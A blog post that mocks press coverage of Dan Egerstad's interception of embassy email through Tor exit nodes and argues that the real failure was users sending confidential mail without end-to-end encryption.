Swedish Police Bust International Super Hacker

Alright, so...not really. Earlier this year Dan Egerstad, a Swedish security consultant, performed an experiment over the Internet. Every description of the hack contains a description similar to this one, from the Sydney Morning Herald:

...intercepted data carried over a global communications network used by embassies around the world in August and gained access to 1000 sensitive email accounts. They contained confidential diplomatic memos and other sensitive government emails. The hack required little more than tools freely available on the internet...

As reported in the SMH, Egerstad was picked up for questioning by the Swedish equivalent of the FBI and CIA. Not so bad, a dangerous hacker who infiltrates "global communications networks" is off the streets. Score one for the Cyber Justice League. Right, but not really...

TOR (aka: The Onion Router) is a project run by the Electronic Frontier Foundation (EFF). TOR's purpose is to make secure, anonymous communication possible over an unsecured network. That is, it primarily allows for anonymity over the Internet. Of course, it would seem that lots of people use TOR without even a cursory look at their website. Here's some interesting tidbits from the Warnings section on TOR's download page:

1. Tor only protects Internet applications that are configured to send their traffic through Tor — it doesn't magically anonymize all your traffic just because you install it.

4. Tor anonymizes the origin of your traffic, and it encrypts everything inside the Tor network, but it can't encrypt your traffic between the Tor network and its final destination. If you are communicating sensitive information, you should use as much care as you would on the normal scary Internet — use HTTPS or other end-to-end encryption and authentication.

It turns out that shiny toys do not a security policy make. Employees of various embassies around the world were sending confidential diplomatic memos, using an unencrypted, insecure channel, through TOR. Really? Nowhere in the guidebook does it say "When sending confidential memos make sure to encrypt your traffic, or at least use HTTPS"?

So, let's have a quick rundown of what our super hacker did.

• He installed TOR (freely available here) at a few locations and set himself up as an exit node
• He installed a packet sniffer (like Wireshark, freely available here)
• Other people, by installing TOR, routed their communications through our hacker's computer. Some of this information included confidential information, as well as usernames and passwords
• After receiving somewhere around 1000 logins for various email accounts, our hacker tried to contact these people to let them know what they were doing wrong.
• Receiving no response he posted 100 of the logins to the Internet to generate publicity of the problem.

With the exception of the last everything seems pretty out in the open. Although, what to do when you find a critical security issue and nobody will listen to you is an old problem, and one that I won't go into now. Still, according to the article, seems like extreme measures for somebody who was trying to keep everything out in the open.